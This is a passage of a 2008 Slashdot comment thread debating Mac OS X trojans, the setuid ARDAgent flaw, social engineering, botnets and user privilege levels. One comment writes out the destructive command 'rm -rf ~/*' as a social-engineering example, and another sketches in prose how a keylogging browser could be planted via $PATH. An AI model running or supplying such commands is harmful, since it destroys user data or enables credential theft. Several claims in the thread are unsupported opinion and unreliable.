  I have been one of the first to point out the same thing in each of these past cases but this is different. We have a scriptable application setuid to root. That's an obvious vulnerability on a sliver platter. What was Apple thinking? The application in question is NOT suid on my system (Yes, I looked inside the .app too). I think it's likely that a third-party app or framework, like MacPorts or something, is responsible for making the change - "fix permissions" should take care of it - I don't think this is Apple's fault.
  
  --
  "terrorism" and "pedophilia" are the root passwords to the Constitution
46. Re:Yawn by Anonymous Coward · 2008-06-25 06:46 · Score: 0
  
  That was the second day test that required direct access to the machine so it's not exactly discouraging.
  I could also assume winning a Mac was more desirable than a PC.
  If you have real world malware/spyware, we can talk.
47. Re:Yawn by rolfwind · 2008-06-25 06:50 · Score: 1
  
  Now that being the case, if Windows has 93% marketshare, OS-X 6%, and Linux 1% -- what platform will you choose to attack?
  A big pie with many fingers in it already. OS X would seem to be an attractive market, no?
  Lot less anti-spyware, antivirus running on those machines to boot.
  Also, you didn't attack the argument, just the person. I thought the argument was rather good.
48. Re:Yawn by Lars+T. · 2008-06-25 07:46 · Score: 1
  
  Are you telling me these servers weren't looked after by admins:
  http://it.slashdot.org/article.pl?sid=08/01/24/1930207 ?
  
  --
  Lars T.
  To the guy who modded me down from perfect to terrible Karma - Apple haters still suck
49. Re:Yawn by Lars+T. · 2008-06-25 07:47 · Score: 1
  
  http://it.slashdot.org/article.pl?sid=08/01/24/1930207
  
  --
  Lars T.
  To the guy who modded me down from perfect to terrible Karma - Apple haters still suck
50. Re:Yawn by Lars+T. · 2008-06-25 07:55 · Score: 1
  
  If I were a dirt-bag, scum-bucket hacker type, I'd probably really hate Macs and thus, try to attack those because of my out-of-proportion hatred towards Hipsters and Shiny Things. But then you would have no clue how to actually program Mac malware, and you would have to go for slightly modified code snippets from a Slashdot-post to show those Macies.
  
  --
  Lars T.
  To the guy who modded me down from perfect to terrible Karma - Apple haters still suck
51. Re:Yawn by KGIII · 2008-06-25 08:08 · Score: 1
  
  Evidence? None. I applied rather simple logic instead. Mac users are just as human as Windows users and the percentage of stupid users is going to remain the same. There's no magic Mac-pill that thwarts stupidity thus making ensuring social engineering remains effective. The exception to this, again no evidence, would be the various rare(r) PC OSes. The people who are using specific tools (RiscOS, *NIX, etc...) are _more likely_ to be better educated and aware of the risks. I am not a *NIX user as my main choice but I freely admit that *NIX users tend to be smarter about their actions on a computer.
  
  --
  "So long and thanks for all the fish."
52. Re:Yawn by Anonymous Coward · 2008-06-25 08:22 · Score: 0
  
  Take your hands off of the keyboard. Stand up and step away from the computer.
  Most botnets are used by governments not to make money? Are you nuts? What are the most popular uses for botnets?
  Try to take down a site? yes
  To email as many people as possible? yes
  To make money off of said emails? yes
  To gather information and send it to ? yes.
  To spy on people for the government? *sounds of crickets* ... no
  Malware/virus writers learned that they could make a lot of money by botting machines then by breaking them. Which is why we see less of the computer killing stuff nowadays. The number of viruses that go around deleting the fat table on the disk drives has dropped. Deleting all of your files has dropped. Coping them is on the rise. Sending all of your bookmarks, form info, saved passwords somewhere is high on the list.
  Most sane governments are not doing this.
53. Re:Yawn by KGIII · 2008-06-25 08:40 · Score: 1
  
  I'd respectfully argue that you're confusing today with the near future in my humble opinion. It is my opinion, I haven't amassed nor analyzed the data, that the current affairs are still such that botnets are being used for spam, propagation of more malware, and DDoS attacks. The latter *may* be politically motivated but, at this time, I still haven't found overwhelming evidence to say that the majority of malware is politically motivated. I'll see you're thoughts and raise you one.
  
  I have every reason to believe that what you're claiming is the future. I have ever reason to believe that there have been some attacks that were backed by governments. I just don't see that as the norm yet. I suspect that the rate of government backing and politically based attacks are increasing and I believe that there will come a time in the future when there are full-scale attacks on major infrastructures on a regular basis with the various results (MAD anyone?), but not yet do I (again, no data, just observing) see this as the norm but rather as the exception. (I'd even go so far as to suspect that some attacks aren't yet officially sanctioned in all cases they are most likely tacitly approved by various governmental agencies across the globe.)
  
  Additionally, I suspect that there are plenty of bits of malware for most every OS out there - much as you say. I suspect that they're out there, that they are either in place or ready to deploy. I suspect that they remain hidden well enough to prevent detection and/or they are used so efficiently that they're simply not noted or made public by the victims.
  
  *shrugs* I think we're on the same page for the most part it is just that I'm seeing what you're saying as the future and you're saying that it is more prevalent today than I am aware of. Such may well be true and I can only base my opinions on the information that I have seen. I haven't crunched the numbers (and I'm not going to but would love it if someone has or will) but I'd not be surprised terribly if I were wrong. I keep tabs on the industry and the various reported security issues, responses, and events as I am wont to do.
  
  I spent a goodly amount of time nominally involved in the industry though that was years ago and my interests today are just that. I'm just interested because the subject is important to me for my own use and, in some instances, to better enable my hosting clients to make more informed choices or to assist them in achieving a more secure state. Without knowing more about you I would have to say that I'd not be at all surprised (or even really bothered) to find out that there is more political motivation than I was aware of. It may be that I am just more observant of the security events that most likely have a more immediate impact on my or my interests.
  
  Hmm... I think that's about it. Maybe... No, I guess. The last *major* problem that I assisted in was my (unfortunately post event) articulation of the dangers of spear phishing for some hosting clients and their company. It was really not something I needed to do but they brought it to our attention and asked for assistance. They had lost quite a bit of money, the criminal's plans were really well thought out, and there wasn't anything I could do about it except give them some education. This has little bearing on the specific threats of this threat, other than social engineering which is a rather mundane topic that involves death, horses, and a bat but it matters because, again, the bias is there so that's further evidence that I may just be paying attention to a limited scope and you have a wider view.
  
  --
  "So long and thanks for all the fish."
54. Re:Yawn by drinkypoo · 2008-06-25 10:04 · Score: 1
  
  Anything! Well, it's not as bad as vista. But the point is, if I've JUST answered a password prompt and I obviously haven't left the keyboard, I shouldn't be prompted again even if it's a legitimate point to prompt someone. I noodle around with all kinds of settings and change and tweak things endlessly, which is one of the reasons I love Linux so much. I'm not saying it's for everyone or that the Mac is for no one, but I got super-annoyed with that particular issue. Just because I wander around in places that Apple thinks need extra security often doesn't mean I should be prompted into oblivion.
  
  --
  "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
55. Re:Yawn by Tom · 2008-06-25 10:06 · Score: 1
  
  Mac users are just as human as Windows users and the percentage of stupid users is going to remain the same. You make two assumptions there that I'd like to challenge.
  One, that how humans act is independent of the environment and context. Almost everything in psychology strongly suggests the opposite. People in a different environment will act differently. Mac and windos users might be humans, but their experience with the machine are (slightly) different, and those differences can be leveraged. It's not a matter of intelligence, but expectations. If an UAC window gets on your nerves every few minutes, you stop reading them and taking them seriously. On the Mac, such "I need your password" popups are a lot less common, which means people aren't as used to them and more likely to actually read them. One of many examples. And yes, OS X still does a whole lot of things wrong.
  Two, that users are stupid. I know this is common in IT. Took me a long time to get over it myself. But fact is that users are not stupid, we make them stupid. Almost all user interfaces currently in use are badly, badly broken. If your car would require you to press three different buttons in three different places with two hands and your nose in order to brake, and car manufacturers would put the horrible number of accidents to "user's are stupid" - that's more like the truth.
  
  --
  Assorted stuff I do sometimes: Lemuria.org
56. Re:Yawn by KGIII · 2008-06-25 13:18 · Score: 1
  
  I mostly write this for my own memory (please disregard most anyone else). I will ponder and respond when I have thought about the above. (One small thing - stupid users exist. But not all users are stupid nor is their ignorance always their fault. It is, though, a stupid user that blindly clicks and enters information in my opinion but I'll ponder so that I have actually thought before speaking.
  
  --
  "So long and thanks for all the fish."
57. Re:Yawn by Anonymous Coward · 2008-06-25 15:41 · Score: 0
  
  As a Mac user, I'm going to defend the above comment as not trolling. It's a logical argument. Likewise are all the arguments about human stupidity, which is not limited to any given platform, rather, to reference Voltaire, is a pretty good working analogy for infinity.
  Viruses thrive because of stupidity, not necessarily because of this or that platform's dominance (although there is more incentive to target a moderately secure, widespread OS over a reasonably secure, less common OS) or this or that security hole.
  Basically, it is possible to be trojan free without anti virus software on Windows or Mac OS, just that most people are stupid enough to be able to catch one even with anti virus software. Fortunately I won't be called a troll because stupid people don't hang out on /. ;-)
58. Re:Yawn by KGIII · 2008-06-25 15:46 · Score: 1
  
  Sorry for not being clearer. Tendencies vs. "will do." There are some who will go after the simplest but if they reap few rewards they have less impact and less to gain. (Quotes are my own interpretation.)
  
  --
  "So long and thanks for all the fish."
59. Re:Yawn by MickDownUnder · 2008-06-26 00:26 · Score: 1
  
  Books are always about the past, I've never bothered reading books about IT topics as they are always at least 2 years behind the bleeding edge.
  What happened to Estonia was nothing more than a small scale exercise, Russia's capabilities extend well beyond that.
  No doubt there is a sizeable percentage of hackers out there still in the world of yesterday but the best black hats today do NOT NEED to waste their time with extortion or banking scams, they are on the government payrolls, and they can spend 100% of their time ensuring that they are one step ahead of the white hats and that they have covered all the bases and that of course means hacking Mac OSX.
  Today malware is a national security threat, its defence and an essential member of the arsenal of any 21st century war machine.
60. Re:Yawn by MickDownUnder · 2008-06-26 00:29 · Score: 1
  
  You have no idea what i'm talking about. Try reading the article i linked to.
61. Re:Yawn by MickDownUnder · 2008-06-26 00:38 · Score: 1
  
  I was saying the largest botnets with the greatest penetration today are state run/backed and are largely silent, not being used for fraud, blackmail or anything so basic, they are being held in reserve for when they are needed in an attack on a 21st century opponent.
  No it is not the norm in terms of the numbers of botnets out there, but in terms of the number of compromised machines, it probably is the norm.
62. Re:Yawn by phantomfive · 2008-06-26 03:23 · Score: 1
  
  Uhuh.....so instead of being bothered to read books, you decide to draw your own random conclusions based on what you think? The best black hats are on government payrolls? In Russia? Because they make more money? Do you have any evidence of this? Do you really think Russian government employees make a lot of money? It is a great thought, but you better have some pretty good evidence to back up such an extravagant claim.
  
  --
  Qxe4
63. Re:Yawn by Lurker · 2008-06-26 03:43 · Score: 1
  
  Unfortunately, there are already hundreds of Mac viruses. I have some super-spammed e-mail accounts, that get hundreds of infected e-mails per day, and more often than not, viruses come with ".hpx" extensions and other MacOS file extensions. Ignoring these threats could have severe consequences for a Mac user, if they would click on such file.
  
  This is the second time you've made the claim that there are hundreds of Mac viruses, and I'm calling bullshit. There were a total of, I think, 42 viruses *ever* for Mac OS 9 and below, and so far maybe two for OS X and I'm pretty sure those were classified as trojans, not viruses. So, if you don't mind, please provide evidence of these hundreds of viruses for Mac OS.
64. Re:Yawn by flnca · 2008-06-26 03:55 · Score: 1
  
  Well, this was just a rough estimate, I did not bother to count them. Providing you with proof would require scouring hundreds of thousands of (potentially archived) spam e-mails that I received. But even in the roughly 10,000 or so in my more recent spam-flooded accounts, doing that by hand is impossible. I would have to write a program to search through the mail folders for Mac file extensions. I can only tell you and others that are using Macs to be careful, because I've seen many, many MacOS file attachments. I'm not a MacOS user, so all I wanted is to post a reminder that not everything's peachy in Mac-land.
65. Re:Yawn by JeffSpudrinski · 2008-06-26 08:25 · Score: 1
  
  Hey, Poltras,
  Speaking from the other side of the fence (as a system admin), I have to agree with your statement with couple of exceptions.
  Security is perceived as a serious pain in the rear by users. I inherited the network I manage and it's MUCH more secure than it was when I got it. However, there's still a TON of things I would love to do that I'm either not allowed to or am not given the money to do. I was finally allowed to upgrade to a stateful inspection firewall, but wasn't allowed to close outgoing ports as I was the incoming ports. It was decided by higher-ups that they didn't want to cause problems for the users who were not causing problems (therefore leave outgoing stuff open for everyone).
  It's also very difficult to take away priviledges once they've been given (e.g. "what do you mean I have to manually allow javascript now? Why won't it just work like it did before?")
  I am extremely strict on incoming traffic and only have a few ports open and then have the traffic directed to the pertinent (hardened) server.
  Not saying I won't ever get hacked, but I try to protect us here as well as I can and try not to be a tempting target (that's not an invitation to try...!).
  I am very cautious about dealing with other sysadmins directly because you never know what you'll get. Too many companies don't pay sysadmins enough and they move on to bigger and better after a while (I've been here 16 years now and have been the sysadmin for 7 years).
  You are also very correct about the software -vs- dedicated hardware firewall. "Ye Average Joe User" doesn't understand the difference.
  Users just want things to work without having to be bothered by annoying things such as security and when enough of them complain, management tends to listen to them rather than the person they pay to make the system secure.
  I don't consider myself "brilliant" by any stretch of the imagination, but I sincerely hope I wouldn't qualify as an "incompetent, overpaid screen-looker".
  Later,
  -JS
66. Re:Yawn by Anonymous Coward · 2008-06-27 00:31 · Score: 0
  
  LOL yep, firewall port 80 of a web server and you're safe. They're SERVERS. 0 day vulnerable by design.
67. Re:Yawn by MickDownUnder · 2008-06-27 14:54 · Score: 1
  
  Anyone with half a clue on the topic wouldn't base their opinions on books which are about 5 years out of date. It takes 2 years to research and write book and then usually another year to get it into print, if you buy it a year or two after it was published... there's your 5 years. You might as well go read Harry Potter because at the end of the day it's more about entertainment than insight.
  Your best source of information on this topic is from your own IP logs and persons in the security business.
  In any case there is a ton of evidence freely available on the net that both the Russian and Chinese goverments are actively involved in cyber warfare. There have been numerous incidents which have no other explanation. Like for example the attacks on Garry Kasparov's web site...
  http://www.theotherrussia.org/2007/05/30/other-russia-websites-under-attack/
  These were timed to co-incide with an order to move the site of a political rally, when people assembled at the wrong location he was arrested for having co-ordinated an illegal assembly, that was a clear case of state police co-ordinating with DOS attacks. It has also been established through IP logs that there was overlap between these attacks and the attacks made on Estonia.
  With the Russian state controlling the media, the internet is absolutely essential for political opposition in Russia, same goes for China.
  In a time of war there is no doubt these networks will be used to inflict financial and logistical chaos on countries.
  So it is natural to presume European and US powers will or most probably already have a counter to this threat, which can really only be in kind.
  In the 21st century governments will be recruiting black hats to create botnets both to shut down zombies machines actively participating in an active botnet and also to launch their own attacks. And of course these persons are going to be extremely highly skilled very well rewarded (both Russia and China have $$$ now).
2 Trojans? by Anonymous Coward · 2008-06-24 20:03 · Score: 0

Damn. I told you mac users were all filthy dirty sluts.
Grrr... by mallardtheduck · 2008-06-24 20:12 · Score: 5, Insightful

The ARDAgent vulnerability is pretty serious and stupid, but social engineering is not OS specific. The "poker game" could just as easily be implemented on Windows or Linux.
There is nothing that any OS can do to prevent trojans. (At least not without seriously limiting the functionality of legitimate programs.)
Slashdot's own summarry of the ARDAgent vulnerability included a "proof-of-concept" it is trivially easy to exploit and should be fixed ASAP.
There is no news here.
1. Re:Grrr... by TheLink · 2008-06-24 21:24 · Score: 1
  
  Sandboxing could help.
  https://bugs.launchpad.net/ubuntu/+bug/156693
  --
  
  Too many replies beneath your current threshold
2. Re:Grrr... by mallardtheduck · 2008-06-24 21:42 · Score: 2, Interesting
  
  However, once you have convinced the user to download and attempt to run the program, it is a short step to getting them to approve administrator access.
  By "seriously limiting the functionality of legitimate programs" I was referring to systems such as Bitfrost which, while providing strong protection against Trojans, also makes certain classes of application almost impossible to implement (i.e. a mass Flickr uploader or an FTP client).
3. Re:Grrr... by martin-boundary · 2008-06-24 22:41 · Score: 1
  
  social engineering is not OS specific.
  To some extent, it actually is. Social engineering depends on the characteristics of the users being targeted, which includes their technical ability as well as how they choose to set up their environments.
  What makes an OS like Windows more vulnerable than a Linux OS (say) is both the larger and more diverse user population, which increases the likelihood of catching the right kind of (gullible) user, and also the strong standardization in Windows which guarantees the existence of tools and services to conduct the deed, whereas Linux tools are much more hit and miss due to the diversity of what is installed.
  A good example of the difference are those pop up browser windows which show a fake system error message that I'm sure everybody has seen at some point. This is a social engineering attempt to fool Windows users, and the window decorations are purposefully chosen to fake a Windows system error message. Now this would never work well against Linux users, because there are so many different window managers in use that it's impossible to target a majority of users with a common fake error window.
  So the Windows OS is easier to target, even in a social engineering attack.
4. Re:Grrr... by Tom · 2008-06-25 00:15 · Score: 1
  
  There is nothing that any OS can do to prevent trojans. (At least not without seriously limiting the functionality of legitimate programs.) Nonsense. Of course there are things you can do. None of them are easy, or entirely without inconvenience, but there are.
  You could, for example, get away from the "root == god" paradigm and add a user (or group) for more day-to-day admin tasks. Reserve the highest priviledge level for modifications to the core system, i.e. the OS and core tools. To install an additional screensaver shouldn't require those top-level priviledges. That way, you could alarm users very strongly when a tool requires top-level priviledges, and tell them in no uncertain terms that this is highly unusual.
  You'd not eliminate all attacks, but you would make the usual total-control takeover a lot more difficult.
  There are other methods. I just outlined one to show that your claim as to "nothing" is overblown.
  
  --
  Assorted stuff I do sometimes: Lemuria.org
5. Re:Grrr... by TheLink · 2008-06-25 00:26 · Score: 1
  
  My proposal has programs claiming what class of access they want (e.g. I need screen saver access), the user approving it and the O/S enforcing it (and optionally remembering the user's choice).
  
  Screensavers don't normally need network access or access to your personal documents or access to your webcam or microphone.
  
  So even if a "screensaver" is lying about being a screensaver, the damage it can do is limited to what a normal screensaver can do.
  
  Vista has sandboxing but it fails because it prompts so much that most people either turn off the controls or turn off their brains (get a habit of clicking through).
  
  Having users figure out whether a program is safe is similar to requiring them to solve the halting problem.
  
  It is easier to train users to recognize that something is wrong when a "screen saver" requires "Full System Privileges" (and the O/S starts showing scary warnings and disclaimers).
  --
  
  Too many replies beneath your current threshold
6. Re:Grrr... by mallardtheduck · 2008-06-25 00:26 · Score: 1
  
  But that won't stop a trojan from installing a spambot (since a normal user still needs permission to send emails) or stealing the user's data (since a normal user still needs access to their files and access to the internet).
  What's really needed is a change from the "any program can do anything that the user can do" paradigm. Unfortunately, this can't be done without restricting the functionality of legitimate programs.
7. Re:Grrr... by stewbacca · 2008-06-25 02:42 · Score: 1
  
  Nothing looks more ridiculous than a WinXP fake system error pop-up in the middle of an OSX Safari session. It wouldn't be hard to determine the OS and display an OS-specific error screen, but hey, nobody ever accused the cretins of being intelligent.
8. Re:Grrr... by ianare · 2008-06-25 03:09 · Score: 1
  
  I was watching a show about tropical rain forests, in which scientists were explaining the amazing diversity of plant species found there.
  They examined plots where there would be many different species in a small amount of space, and where members of the same species would be far from each other.
  In a hot and humid environment, disease causing organisms, whether fungus or bacterial, spread at a very high rate. Any plant species that grows too closely together gets wiped out, so there is a lot of pressure for diversity.
  
  Apply this to the current OS ecosystem - you have one 'species' covering almost all the land, and densely packed. If a disease breaks out, it spreads very quickly to many individuals.
  Having a greater diversity of OSes would be a real drag for spammers, bot-herders, ID thiefs, etc.
  
  I say the sooner the better!
9. Re:Grrr... by Tom · 2008-06-25 03:27 · Score: 1
  
  As I said, no single countermeasure will ever stop all possible attacks, so we agree on that.
  And yes, I agree that more limits on programs is a great thing to do. It just requires one little thing that most software developers are too lazy to do: The program needs to be able to tell the OS (e.g. at install time) everything that it expects to do under normal circumstances. If it wants to send mail, it must say so at install time, not suddenly "remember".
  
  --
  Assorted stuff I do sometimes: Lemuria.org
10. Re:Grrr... by LMariachi · 2008-06-25 07:24 · Score: 1
  
  Semantics. OP was saying you can't block a meaningful percentage of trojan vectors, not that there are no possible strategies to prevent them. Even in *nix, there's always the possibility of convincing a user to open an xterm and type "rm -rf ~/*", which, from the user's point of view, would be a lot more damaging than some suid malware chewing up cycles and bandwidth. You don't need root access in order to be a problem.
11. Re:Grrr... by Tom · 2008-06-25 10:09 · Score: 1
  
  Semantics. OP was saying you can't block a meaningful percentage of trojan vectors, not that there are no possible strategies to prevent them Oh, please. Don't start with linguistics if you fail basic reading skills. OP was saying, quote:
  There is nothing that any OS can do to prevent trojans. There's an all-quantor there, if you insist on semantics. Maybe he meant what you point out, but he didn't say it.
  
  --
  Assorted stuff I do sometimes: Lemuria.org
12. Re:Grrr... by LMariachi · 2008-06-25 16:40 · Score: 1
  
  Read in absolute terms, the statement is utterly absurd, which is why I figured the author didn't literally mean "nothing" and "prevent." When a man says "Nothing is certain except death and taxes," or "Nobody expects the Spanish Inquisition," one doesn't take him to mean that gravity is iffy or that Torquemada spontaneously came into existence full-grown. Believe me, I'm all in favor of accuracy in language, but it isn't math.
13. Re:Grrr... by Tom · 2008-06-25 23:18 · Score: 1
  
  Actually, I think math is a language, but that's beside the point because the reverse isn't true.
  Yes, he probably didn't mean what he wrote. Which leaves the question why he wrote it in absolute terms when he didn't mean it. I still think it's better to challenge the words someone (objectively) uttered than the meaning I (subjectively) assume. The assumption might be wrong and then the discussion gets either awkward or confused. In the first case, he can always correct and point out what it really was that he meant.
  
  --
  Assorted stuff I do sometimes: Lemuria.org
Society is not an OS X vulnerability by Anonymous Coward · 2008-06-24 20:18 · Score: 5, Insightful

For crying out loud people, the poker game one is applicable to any system you want to code it on! What does this have to do with being a Mac OS X security hole? It would work on Linux, BSD, RandomOSMadeUpOnTheSpurOfTheMoment (Infinium labs).
1. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-24 20:27 · Score: 1
  
  It's more about who you are on the system when you run it.
  I don't know OS X at all but if most people log in with adminstrator or root permissions like they do in Windows, then it's a problem because the Trojan can do it's dirty work all over your system - otherwise it can just damage the same stuff that the user has write permissions to.
  
  --
  Gentoo Linux - another day, another USE flag.
2. Re:Society is not an OS X vulnerability by vux984 · 2008-06-24 20:45 · Score: 1
  
  I don't know OS X at all but if most people log in with administrator or root permissions like they do in Windows,
  1) Windows XP and previous default to administrator accounts. Windows Vista is more like Ubuntu, except it prompts you more often (mostly because tons of old XP and earlier software tries do things it really shouldn't need to do). There is a good REASON MS is trying to kill off XP.
  2) OS X is like Vista and Ubuntu.
  then it's a problem because the Trojan can do it's dirty work all over your system - otherwise it can just damage the same stuff that the user has write permissions to.
  'just' the stuff the user has write permissions? So, like, all his personal files, financial data, work data, email, pictures, compositions, contact list, his application preferences, and his personal start up tasks.
  Whew, good thing its restricted to 'just' that.
3. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-24 21:05 · Score: 1
  
  On the basis that as a good administrator you are already backing up user files regularly, then you restrict any damage to "just" those files meaning that you still will have a core working system to restore back onto.
  Please go read an appropriate book - this really is "standard" sysadmin stuff.
  
  --
  Gentoo Linux - another day, another USE flag.
4. Re:Society is not an OS X vulnerability by Anonymous Coward · 2008-06-24 21:07 · Score: 0
  
  I think it's easier on the *nixes to run as a normal user than it is on Windows, your day to day use of the computer is less likely to need admin privileges.
  The default first user is an admin account on OS X, i.e. it has sudo privileges. I changed my personal account to non-admin i.e. no super user.
  Nevertheless, the parent makes a good and often forgotten point. A virus *doesn't* have to have root to be a considerable pain in the neck. Mod parent up.
5. Re:Society is not an OS X vulnerability by squiggleslash · 2008-06-24 22:11 · Score: 4, Insightful
  
  Do you really think the average computer user is a "standard" sysadmin who knows "standard sysadmin stuff"?
  Most people who buy computers want and expect it to "just work" rather than to spend time learning how to maintain the system. The ideal system, for them, is maintenance free. Funnily enough, one computer manufacturer in particular specializes in the whole "just works" concept. Their customers definitely do not expect to have to set up cronjobs to copy files across the network to a secure RAID server in the closet.
  Can you guess which manufacturer that is?
  
  --
  You are not alone. This is not normal. None of this is normal.
6. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-24 22:16 · Score: 1
  
  In which case, take it from someone who is experienced and maybe learn something.
  Unfortunately, you're leading this argument in a big circle because if you are an inexperienced user who then just happens to do everything with administrator priveliges without realising the consequences (whether that's in Windows, OS X, Linux, whatever) then I am telling you now, as a matter of plain fact as someone who works in OS security, that you are at more risk of bad effects from a Trojan than if you do most stuff with normal priveliges.
  Take it or leave it, it's up to you.
  
  --
  Gentoo Linux - another day, another USE flag.
7. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-24 22:19 · Score: 2, Informative
  
  A virus *doesn't* have to have root to be a considerable pain in the neck. Mod parent up.
  I agree entirely - but what's easier to recover? Just damaged user files or the whole system plus the damaged user files?
  
  --
  Gentoo Linux - another day, another USE flag.
8. Re:Society is not an OS X vulnerability by mwlewis · 2008-06-24 22:50 · Score: 3, Insightful
  
  Depends upon what sort of information they stole from your user files. How do you 'recover' stolen proprietary information? The 'whole system' may be trivial in comparison.
  
  --
  JOIN US FOR PONG!
9. Re:Society is not an OS X vulnerability by vux984 · 2008-06-24 23:26 · Score: 1
  
  On the basis that as a good administrator you are already backing up user files regularly, then you restrict any damage to "just" those files meaning that you still will have a core working system to restore back onto.
  1) The average PC doesn't have a good administrator.
  2) The real damage malware will do to a user has nothing to do with damaging files, its related to identity theft and data theft. Backups don't get you very far here.
  3) If you are doing proper backups, then a full system restore really isn't that much more work than a single profile restore. Its slightly more time consuming, but the average user doesn't really care.
  Please go read an appropriate book - this really is "standard" sysadmin stuff.
  So is the fact that most malware can do most of what it wants to do even if its confined to the user profile, so trumpeting about Linux/OSX's superior security model is almost irrelevant.
  Yet here we are...
10. Re:Society is not an OS X vulnerability by isorox · 2008-06-24 23:52 · Score: 1
  
  On the basis that as a good administrator you are already backing up user files regularly, then you restrict any damage to "just" those files meaning that you still will have a core working system to restore back onto. Irellevent. I can reinstall my OS and all applications in under an hour, and as long as I have a recent backup of /home it's easy to recover. This isn't the 90's, people dont care about their computer, they care about their data.
  More worrying is something that replaces the /usr/bin/firefox with a keylogging version. You'd need root access for that, which is why local exploits are important. Of course the average slashdotter wouldn't run untrusted binaries or code. This is where the local exploit in conjuction with a vulnerability in apache (which gives hardly any access to an exploiting program) is dangerous, and the biggest threat to the average aware Linux user. The other main threat is a breach of you distro's repositories.
11. Re:Society is not an OS X vulnerability by Anonymous Coward · 2008-06-25 00:20 · Score: 0
  
  But it's twice as easy to program on ruby on rails, as long as you copy their sample app
12. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-25 01:38 · Score: 1
  
  So is the fact that most malware can do most of what it wants to do even if its confined to the user profile, so trumpeting about Linux/OSX's superior security model is almost irrelevant.
  Rather than acting on emotion, I suggest you need to reread my original post because not at one point did I trumpet about security models.
  What I did say in response to another posting was that because of marketing by Apple and Microsoft, OS X and Windows are sold as "easy for newbies" to use &, likewise, people like you trumpet constantly about how difficult Linux is to use. Therefore, it is logical to suggest that more newbie users use OS X and Windows than they do Linux and therefore are part of the problem when it comes to insecurities in ANY OS.
  I also use XP and because I know about security, I do not get any problems with it and cannot recall the last time I got a virus on it. I do find the Windows security model overly complex compared to UNIX/Linux but that's just opinion and I'm sure there are plenty of better qualified Windows sysadmins than me who could argue the opposite.
  If you are going to respond to my comments then please read them properly first and then stay on topic. Thanks.
  
  --
  Gentoo Linux - another day, another USE flag.
13. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-25 02:11 · Score: 1
  
  Please stop playing the pedant.
  It has nothing to do with "what" was stolen and you know it. It's just a diversionary tactic you are employing because you have taken everything I have said as being a criticism of your wonderful OS X. In reality, had you pushed the raw emotion aside, you would have read my comments for what they are - namely, the fact that inexperienced users are part of the problem by doing stuff using too high permissions and that is the case whatever OS they care to use.
  
  --
  Gentoo Linux - another day, another USE flag.
14. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-25 02:28 · Score: 1
  
  Irellevent. I can reinstall my OS and all applications in under an hour, and as long as I have a recent backup of /home it's easy to recover. This isn't the 90's, people dont care about their computer, they care about their data.
  Your statement is a paradox. How can you care about your data and NOT care about the computer you store it on??? Do you mean to tell me that applying security updates, running security scanners and malware checkers are not relevant??? Remind me never to give you any of MY data to keep safe then...
  More worrying is something that replaces the /usr/bin/firefox with a keylogging version. You'd need root access for that, which is why local exploits are important.
  Huh??? Why do you need to REPLACE /usr/bin/firefox??? Why not just put another (keylogging) Firefox binary into the user's $PATH so that version is run first? Why would you need root access to do this?
  This is where the local exploit in conjuction with a vulnerability in apache (which gives hardly any access to an exploiting program) is dangerous.
  What relevance does Apache have here? What about an exploit using Microsoft IIS? Or Safari? Or SAMBA? Any client/server application that can be accessed over a network can be theoretically exploited...
  and the biggest threat to the average aware Linux user.
  Why would the average aware Linux user be running Apache? Sure, it can be installed easily enough but it's not installed by default on the Linux distros designed for desktop users that I'm aware of.
  The other main threat is a breach of you distro's repositories.
  Why is this any different to a breach of Apple's update web site? Or Microsoft's? I could argue this entirely the other way that since OS X and Windows are commercial OSes, there a lot more people torrenting and installing pirated copies of both that are infested with malware. At least with a Linux distro, the official web site will publish a checksum for the .ISO so at least you can check it with md5sum before you trust it.
  Are you really that blinkered that you cannot see that every point you have made can be levelled at every OS equally well?
  
  --
  Gentoo Linux - another day, another USE flag.
15. Re:Society is not an OS X vulnerability by mwlewis · 2008-06-25 02:30 · Score: 1
  
  My OSX? I don't now, and I don't plan to ever use OSX. I'm not sure why you'd say this in response to my comment, which didn't even mention anything OSX specific.
  
  User level access is all that's required to get the user's information. I'm not saying that compromising a system doesn't matter, but just that the problem is more than about unnecessary admin/root users. If you can social engineer someone to run something, you can potentially steal their information without escalating privilege. I certainly agree with the inexperienced user part, and unnecessary admin/root is a problem, but after losing (note: not just damaged, but stolen) key information, formatting and re-installation may be trivial in comparison.
  
  --
  JOIN US FOR PONG!
16. Re:Society is not an OS X vulnerability by Anonymous Coward · 2008-06-25 02:32 · Score: 0
  
  That wasn't really the point. Obviously a totalled system is nightmarish. But worrying only about that, which the Slashdot crowd seem to, neglects pertinent and important security risks. Computers are for using, not for simply existing and running smoothly. The user's files are the raison d'etre of the entire damn box.
17. Re:Society is not an OS X vulnerability by Anonymous Coward · 2008-06-25 02:43 · Score: 0
  
  Gee, I dunno
18. Re:Society is not an OS X vulnerability by stewbacca · 2008-06-25 02:47 · Score: 1
  
  My OSX? I don't now, and I don't plan to ever use OSX. I'm not sure why you'd say this in response to my comment, which didn't even mention anything OSX specific. Modus Operandi for Apple bashers--are you new here?
19. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-25 02:50 · Score: 1
  
  Very well - apologies for the assumption about you being an OS X user.
  As to your other point, I see your argument but you need to look at the broader picture.
  Security is all about applying layers of barriers against the person(s) unknown who want to get to your data and/or screw your PC up. So standard stuff like applying updates regularly, running port scanners and running malware scanners are all entirely relevant but there comes a point where additional stuff you can do might not be cost/time effective to do based on the additional protection doing it might give you.
  So therefore it all boils down to working out "risk" - what is the risk of your PC or data being compromised compared to the cost of putting in an additional security barrier. You will never get to 0% risk (i.e. being fully secure) but that can still be a target to aim for.
  The fact is that on just about any OS currently, a user, no matter how experienced, is always more likely to do more damage to a system running as administrator than as a normal user. Therefore, running as a normal user as much as possible reduces the risk of something untoward happening to the overall system - and since it costs nothing more than the time to educate yourself or other users to do this, then it's a "freebie" way of reducing risk to your system.
  So that's my point - it may not be seen by many people here as an important issue but the fact is that it is easy to do and does mean that you have a more secure system as a result of doing it.
  
  --
  Gentoo Linux - another day, another USE flag.
20. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-25 03:06 · Score: 1
  
  Try this for a scenario:
